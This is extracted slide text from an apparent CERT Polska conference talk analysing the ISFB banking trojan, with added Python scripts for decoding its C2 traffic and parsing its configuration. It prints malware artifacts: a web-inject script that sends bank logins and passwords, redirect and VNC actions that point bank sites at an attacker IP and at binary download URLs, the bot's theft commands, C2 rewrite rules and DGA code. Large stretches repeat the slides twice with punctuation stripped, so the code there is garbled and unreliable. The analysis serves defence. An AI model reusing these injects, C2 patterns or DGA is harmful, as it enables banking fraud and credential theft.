    d = re.sub('_([0-9A-Fa-f]{2})', lambda x: chr(int(x.group(1), 16)), d)
    # restore the base64 padding the bot strips
    try:
        e = d.decode('base64')
    except Exception as e:
        d = d + '=='
    pprint.pprint(dict(map(lambda x: x.split('='), decode_req(d).strip('\x00').split('&'))))

PYTHON

Decoded parameters (the pprint output on the slide):

    crc: 7001380
    id: 1065
    ppc: xi
    server: 12
    soft: 1
    user: 0c0d784a0cf755970edbdf4c0cb27fca
    version: 214887

URL format

    path            purpose                   status
    t.php           get new task              used until Sep 2015
    c.php           get new config            used until Sep 2015
    d.php           send stolen data          used until Sep 2015
    images/*.gif    get new task              current format
    images/*.jpeg   get new config            current format
    images/*.bmp    send stolen data          current format
    images/*.avi    download 2nd stage dll    not every C&C

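The request encoding and the path table above, worked into a small triage script, added here as an example and not the author's tooling. It reverses the bot's wrapping of the parameter string (the _XX escapes, the stripped base64 padding, the NUL padding), classifies request paths by the table, and runs over constructed proxy log lines; the encryption layer (Serpent with the key from the static config, per the slides) is left as a pluggable `decrypt` that defaults to the identity so the sample runs offline.

```python
import base64
import re
from urllib.parse import urlsplit

# Added example, not the author's code. Assumptions: `decrypt`/`encrypt` stand in
# for the bot's cipher; the log line format "time client url" is constructed.
ESCAPE = re.compile(r"_([0-9A-Fa-f]{2})")


def unwrap_param(value, decrypt=lambda ct: ct):
    """_XX escapes -> chars, re-pad base64, decode, decrypt, strip NULs, split k=v."""
    value = ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), value)
    value += "=" * (-len(value) % 4)            # the bot strips '=' padding
    plain = decrypt(base64.b64decode(value)).rstrip(b"\x00").decode("latin-1")
    return dict(kv.split("=", 1) for kv in plain.split("&") if "=" in kv)


def wrap_param(params, encrypt=lambda pt: pt):
    """Inverse of unwrap_param, used here only to build sample traffic."""
    plain = "&".join("%s=%s" % kv for kv in params.items()).encode("latin-1")
    plain += b"\x00" * (-len(plain) % 16)       # pad to the 16-byte block size
    enc = base64.b64encode(encrypt(plain)).decode("ascii").rstrip("=")
    return enc.replace("+", "_2B").replace("/", "_2F")


# (pattern, purpose, era) from the URL-format table on the slides; the old
# style is t[RAND].php, c[RAND].php, d[RAND].php with the data in a query value,
# the current style carries the data in the image file name.
PATH_TYPES = [
    (re.compile(r"^/t[^/]*\.php$"), "get new task", "used until Sep 2015"),
    (re.compile(r"^/c[^/]*\.php$"), "get new config", "used until Sep 2015"),
    (re.compile(r"^/d[^/]*\.php$"), "send stolen data", "used until Sep 2015"),
    (re.compile(r"^/images/([^/]+)\.gif$"), "get new task", "current format"),
    (re.compile(r"^/images/([^/]+)\.jpeg$"), "get new config", "current format"),
    (re.compile(r"^/images/([^/]+)\.bmp$"), "send stolen data", "current format"),
    (re.compile(r"^/images/([^/]+)\.avi$"), "download 2nd stage dll", "current format"),
]


def classify_request(url):
    """Return (purpose, era, encoded token) or None if the path is not ISFB-shaped."""
    parts = urlsplit(url)
    for pattern, purpose, era in PATH_TYPES:
        m = pattern.match(parts.path)
        if m:
            token = m.group(1) if m.groups() else parts.query.split("=", 1)[-1]
            return purpose, era, token
    return None


# Parameters seen in the decoded request on the slide; path shape alone is a
# weak signal (any /t...php matches), so require these after decoding.
REQUIRED = {"user", "version", "id", "crc"}


def triage_log(lines, decrypt=lambda ct: ct):
    """Constructed log lines "time client url" -> [(purpose, bot id)] for ISFB requests."""
    hits = []
    for line in lines:
        found = classify_request(line.split()[2])
        if not found:
            continue
        purpose, _era, token = found
        try:
            params = unwrap_param(token, decrypt)
        except ValueError:            # not base64 (binascii.Error is a ValueError)
            continue
        if REQUIRED <= params.keys():
            hits.append((purpose, params["id"]))
    return hits


# Constructed sample, modelled on the decoded parameters shown on the slide.
SAMPLE_PARAMS = {"soft": "1", "version": "214887", "user": "0c0d784a0cf755970edbdf4c0cb27fca",
                 "server": "12", "id": "1065", "crc": "7001380"}
TOKEN = wrap_param(SAMPLE_PARAMS)
SAMPLE_LOG = [
    "10:00:01 10.0.0.5 http://c2.example.invalid/images/%s.jpeg" % TOKEN,
    "10:00:02 10.0.0.5 http://c2.example.invalid/tfctq.php?mkvf=%s" % TOKEN,
    "10:00:03 10.0.0.7 http://www.example.invalid/images/logo.png",
    "10:00:04 10.0.0.7 http://www.example.invalid/test.php?q=notbase64!!",
]

if __name__ == "__main__":
    for purpose, bot_id in triage_log(SAMPLE_LOG):
        print(purpose, bot_id)
```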
C&C response (screenshot slides; images not extracted)

Wiki

Serpent is a symmetric key block cipher that was a finalist in the Advanced Encryption Standard (AES) contest, where it was ranked second to Rijndael. Serpent was designed by Ross Anderson, Eli Biham and Lars Knudsen.

Like other AES submissions, Serpent has a block size of 128 bits and supports a key size of 128, 192 or 256 bits. The cipher is a 32-round substitution-permutation network operating on a block of four 32-bit words. Each round applies one of eight 4-bit to 4-bit S-boxes 32 times in parallel. Serpent was designed so that all operations can be executed in parallel, using 32 bit slices. This maximizes parallelism, but also allows use of the extensive cryptanalysis work performed on DES.

C&C response (screenshot slide; image not extracted)

Command and Control

IAP (server-side nginx rewrite rules)

    rewrite ^/fileto/(.*)\.(bin)  /get128.php?x=$1   break;
    rewrite ^/images/(.*)\.(bmp)  /data.php?x=$1$2   break;
    rewrite ^/images/(.*)\.(avi)  /loader.php?x=$1$2 break;
    rewrite ^/images/(.*)\.(gif)  /task.php?x=$1$2   break;
    rewrite ^/images/(.*)\.(jpeg) /config.php?x=$1$2 break;

IAP (screenshot slides; images not extracted)

Dreambot (server-side Apache rewrite rules)

    RewriteEngine on
    RewriteRule ^c(.+)\.php$ new_chandler.php [L,QSA]
    RewriteRule ^t(.+)\.php$ new_thandler.php [L,QSA]
    RewriteRule ^d(.+)\.php$ new_dhandler.php [L,QSA]
    RewriteRule ^images/(.*)\.(bmp)  new_dhandler.php?q=$1$2 [L,QSA]
    RewriteRule ^images/(.*)\.(gif)  new_thandler.php?q=$1$2 [L,QSA]
    RewriteRule ^images/(.*)\.(jpeg) new_chandler.php?q=$1$2 [L,QSA]

Dreambot (screenshot slides; images not extracted)

Dreambot

    rule isfb_dreambot : banker
    {
        meta:
            author = "mak"
            module = "isfb"
        strings:
            $str0 = "vmware" fullword
            $str1 = "vbox" fullword
            $str2 = "virtual hd" fullword
            $str4 = "qemu" fullword
            $str3 = "c:\\321.txt" fullword
        condition:
            all of them and isfb_dropper
    }

The End, or not

Offsprings and Cousins

Common Roots / Payloads

- Nymaim
- Powersniff / PunchyBagg
- Bolek / KBOT - based on gozi
- Rovnix - ISFB was the ring3 payload protected by rovnix
- Vawtrak - nothing in common

Recap

- One of the oldest bankers under active development
- Interesting solutions
- Various methods of infection
- Elaborate communication methods: DGA, P2P, TOR
- Old bugs die hard
- Read the paper for more details
- Code soon available at makgithubrandom-stuffisfb

Kudos: people that knowingly (or not) helped us

- Slavo
- Paul Black
- Kafeine
- Peter Kruse
- Piotr Kijewski
- Jarosław Jedynak
- Horgh
- Frank Ruiz

Q & A

info@cert.pl  www.cert.pl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak  mak@cert.pl


Joined resources, or J1-structs

    typedef struct {
        DWORD j1_magic;
        DWORD flags;        // can be aPLib packed
        DWORD crc32_name;
        DWORD addr;
        DWORD size;
    } isfb_fj_elem;

C

Known crc32_name values:

- 0x4F75CEA7, 0x9e154a0c - CRC_CLIENT32
- 0xD722AFCB, 0x8365B957, 0x8fb1dde1 - CRC_CLIENT_INI
- 0xE1285E64 - CRC_PUBLIC_KEY
- 0x90F8AAB4, 0x41982e1f - CRC_CLIENT64
- 0x7A042A8A - new, purpose unknown

Static configuration

    typedef struct {
        DWORD off;
        DWORD flags;
        QWORD value;
        QWORD uid;
    } isfb_cfg_elem;

    struct {                          /* typedef name not captured from the slide */
        QWORD count;
        isfb_cfg_elem elems[count];   /* member name chosen here; the slide shows only the type */
        char string_table[];
    };

C

Static cfg - fields

- 0x556aed8f - server
- 0xea9ea760 - bootstrap
- 0x656b798a - botnet
- 0x4fa8693e - key
- 0xd0665bf6, 0x75e6145c - domains
- 0xefc574ae - dga_seed
- 0x73177345 - dga_base_url
- 0xec99df2e - dga_tld
- 0xdf351e24 - tor32_dll
- 0x510f22d2 - tor_domains

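The J1 resource table, the static configuration structure and the field-hash table above, worked into one parser, added here as an example (not the author's tooling). It walks the J1 elements, picks CRC_CLIENT_INI, and decodes the configuration it points at, naming entries from the table; the J1 magic value, the aPLib flag bit, the "value is a string offset" flag bit and matching the 32-bit field hashes against the low DWORD of uid are assumptions not stated on the slides, and the sample blob is constructed.

```python
import struct

# Added example, not the author's code. The sample blob below is constructed.
J1_NAMES = {                      # crc32_name -> resource, from the J1 slide
    0x4F75CEA7: "CRC_CLIENT32", 0x9E154A0C: "CRC_CLIENT32",
    0xD722AFCB: "CRC_CLIENT_INI", 0x8365B957: "CRC_CLIENT_INI",
    0x8FB1DDE1: "CRC_CLIENT_INI", 0xE1285E64: "CRC_PUBLIC_KEY",
    0x90F8AAB4: "CRC_CLIENT64", 0x41982E1F: "CRC_CLIENT64",
    0x7A042A8A: "NEW_UNKNOWN",
}
CFG_FIELDS = {                    # field hash -> name, from the "Static cfg - fields" slide
    0x556AED8F: "server", 0xEA9EA760: "bootstrap", 0x656B798A: "botnet",
    0x4FA8693E: "key", 0xD0665BF6: "domains", 0x75E6145C: "domains",
    0xEFC574AE: "dga_seed", 0x73177345: "dga_base_url", 0xEC99DF2E: "dga_tld",
    0xDF351E24: "tor32_dll", 0x510F22D2: "tor_domains",
}

# Assumptions (not on the slides): the J1 magic is ASCII "J1" read little-endian,
# bit 0 of a J1 flags word marks aPLib packing, bit 0 of a config entry's flags
# means "value is an offset into string_table", and the 32-bit field hashes are
# matched against the low DWORD of uid.
J1_MAGIC = 0x314A
J1_FLAG_APLIB = 0x01
CFG_FLAG_STRING = 0x01

J1_ELEM = struct.Struct("<IIIII")   # j1_magic, flags, crc32_name, addr, size
CFG_ELEM = struct.Struct("<IIQQ")   # off, flags, value, uid


def parse_j1_table(blob, table_off, count):
    """Return the `count` isfb_fj_elem entries starting at table_off, bounds-checked."""
    elems = []
    for i in range(count):
        magic, flags, crc, addr, size = J1_ELEM.unpack_from(blob, table_off + i * J1_ELEM.size)
        if magic != J1_MAGIC:
            raise ValueError("bad J1 magic in element %d" % i)
        if addr + size > len(blob):
            raise ValueError("J1 element %d points outside the blob" % i)
        elems.append({"flags": flags, "crc": crc, "addr": addr, "size": size,
                      "name": J1_NAMES.get(crc, "UNKNOWN")})
    return elems


def parse_static_cfg(data):
    """Decode {QWORD count; isfb_cfg_elem[count]; char string_table[]} into a dict."""
    (count,) = struct.unpack_from("<Q", data, 0)
    table_end = 8 + count * CFG_ELEM.size
    if table_end > len(data):
        raise ValueError("truncated config table")
    strings = data[table_end:]
    cfg = {}
    for i in range(count):
        _off, flags, value, uid = CFG_ELEM.unpack_from(data, 8 + i * CFG_ELEM.size)
        name = CFG_FIELDS.get(uid & 0xFFFFFFFF, "unknown_%016x" % uid)
        if flags & CFG_FLAG_STRING:
            if value >= len(strings):
                raise ValueError("string offset out of range for %s" % name)
            end = strings.find(b"\x00", value)
            cfg[name] = strings[value:end if end >= 0 else len(strings)].decode("latin-1")
        else:
            cfg[name] = value
    return cfg


def extract_client_ini(blob, table_off, count):
    """Locate CRC_CLIENT_INI in the J1 table and parse the config it references."""
    for e in parse_j1_table(blob, table_off, count):
        if e["name"] == "CRC_CLIENT_INI":
            if e["flags"] & J1_FLAG_APLIB:
                raise NotImplementedError("aPLib-packed resource: unpack it before parsing")
            return parse_static_cfg(blob[e["addr"]:e["addr"] + e["size"]])
    raise ValueError("no CRC_CLIENT_INI element in the J1 table")


def build_sample():
    """Constructed sample: a two-element J1 table followed by a 3-entry config."""
    strings = b"c2.example.invalid\x00" + b"0123456789ABCDEF\x00"
    entries = [
        (0, CFG_FLAG_STRING, 0, 0x556AED8F),                       # server: string at offset 0
        (0, CFG_FLAG_STRING, strings.index(b"0123"), 0x4FA8693E),  # key: string at offset 19
        (0, 0, 0x1234, 0xEFC574AE),                                # dga_seed: integer value
    ]
    cfg = struct.pack("<Q", len(entries)) + b"".join(CFG_ELEM.pack(*e) for e in entries) + strings
    cfg_off = 2 * J1_ELEM.size
    table = J1_ELEM.pack(J1_MAGIC, 0, 0xE1285E64, cfg_off + len(cfg), 4)   # public key stub
    table += J1_ELEM.pack(J1_MAGIC, 0, 0xD722AFCB, cfg_off, len(cfg))
    return table + cfg + b"PUBK", 0, 2
```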
Static cfg (screenshot slides; images not extracted)

Man in the Browser, or where does my money go

Dynamic config

    typedef struct {
        DWORD size;
        BYTE  data[size];
    } inject_elem;

    typedef struct {
        inject_elem target;       // url glob
        inject_elem action;       // or regex
        inject_elem params[4];    // other params
    } inject_chunk;

    typedef inject_chunk injects_t[];

C

02122016 ISFB

httpslokalhostpltalksbotconf20161 2758

Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()

2758

02122016 ISFB

httpslokalhostpltalksbotconf20161 2858

Web Actions

FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2858

02122016 ISFB

httpslokalhostpltalksbotconf20161 2958

Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin

2958

02122016 ISFB

httpslokalhostpltalksbotconf20161 3058

The Bot

Registry Keys

02122016 ISFB

httpslokalhostpltalksbotconf20161 3158

Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12

InstallClientNetCfgLastTaskLastConfig

middotmiddotmiddotmiddotmiddot

3158

02122016 ISFB

httpslokalhostpltalksbotconf20161 3258

Other Acctions

GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

3258

02122016 ISFB

httpslokalhostpltalksbotconf20161 3358

Calling Home

02122016 ISFB

httpslokalhostpltalksbotconf20161 3458

ET phone home

Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network

middotmiddotmiddotmiddot

3458

02122016 ISFB

httpslokalhostpltalksbotconf20161 3558

DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)

PYTHON

3558

TOR

02122016 ISFB

httpslokalhostpltalksbotconf20161 3658

TOR

3658

02122016 ISFB

httpslokalhostpltalksbotconf20161 3758

P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet

C

3758

02122016 ISFB

httpslokalhostpltalksbotconf20161 3858

Internet is Hard

3858

02122016 ISFB

httpslokalhostpltalksbotconf20161 3958

URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data

3958

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone

4258

02122016 ISFB

httpslokalhostpltalksbotconf20161 4358

CampC respone

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen

Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES

4458

02122016 ISFB

httpslokalhostpltalksbotconf20161 4558

CampC respone

4558

02122016 ISFB

httpslokalhostpltalksbotconf20161 4658

Command and Control

02122016 ISFB

httpslokalhostpltalksbotconf20161 4758

IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break

4758

02122016 ISFB

httpslokalhostpltalksbotconf20161 4858

IAP

4858

02122016 ISFB

httpslokalhostpltalksbotconf20161 4958

IAP

4958

02122016 ISFB

httpslokalhostpltalksbotconf20161 5058

DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]

5058

Dreambot

02122016 ISFB

httpslokalhostpltalksbotconf20161 5158

Dreambot

5158

02122016 ISFB

httpslokalhostpltalksbotconf20161 5258

Dreambot

5258

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 20: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 2058

Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]

C

2058

Static cfg - fields

02122016 ISFB

httpslokalhostpltalksbotconf20161 2158

Static cfg - fields

0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2158

02122016 ISFB

httpslokalhostpltalksbotconf20161 2258

Static cfg

2258

02122016 ISFB

httpslokalhostpltalksbotconf20161 2358

Static cfg

2358

02122016 ISFB

httpslokalhostpltalksbotconf20161 2458

Static cfg

2458

02122016 ISFB

httpslokalhostpltalksbotconf20161 2558

Man in the Browser or where my goes my mony

Dynamic config

02122016 ISFB

httpslokalhostpltalksbotconf20161 2658

Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]

C

2658

02122016 ISFB

httpslokalhostpltalksbotconf20161 2758

Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()

2758

02122016 ISFB

httpslokalhostpltalksbotconf20161 2858

Web Actions

FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2858

02122016 ISFB

httpslokalhostpltalksbotconf20161 2958

Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin

2958

02122016 ISFB

httpslokalhostpltalksbotconf20161 3058

The Bot

Registry Keys

02122016 ISFB

httpslokalhostpltalksbotconf20161 3158

Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12

InstallClientNetCfgLastTaskLastConfig

middotmiddotmiddotmiddotmiddot

3158

02122016 ISFB

httpslokalhostpltalksbotconf20161 3258

Other Acctions

GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

3258

02122016 ISFB

httpslokalhostpltalksbotconf20161 3358

Calling Home

02122016 ISFB

httpslokalhostpltalksbotconf20161 3458

ET phone home

Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network

middotmiddotmiddotmiddot

3458

02122016 ISFB

httpslokalhostpltalksbotconf20161 3558

DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)

PYTHON

3558

TOR

02122016 ISFB

httpslokalhostpltalksbotconf20161 3658

TOR

3658

02122016 ISFB

httpslokalhostpltalksbotconf20161 3758

P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet

C

3758

02122016 ISFB

httpslokalhostpltalksbotconf20161 3858

Internet is Hard

3858

02122016 ISFB

httpslokalhostpltalksbotconf20161 3958

URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data

3958

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone

4258

02122016 ISFB

httpslokalhostpltalksbotconf20161 4358

CampC respone

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen

Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES

4458

02122016 ISFB

httpslokalhostpltalksbotconf20161 4558

CampC respone

4558

02122016 ISFB

httpslokalhostpltalksbotconf20161 4658

Command and Control

02122016 ISFB

httpslokalhostpltalksbotconf20161 4758

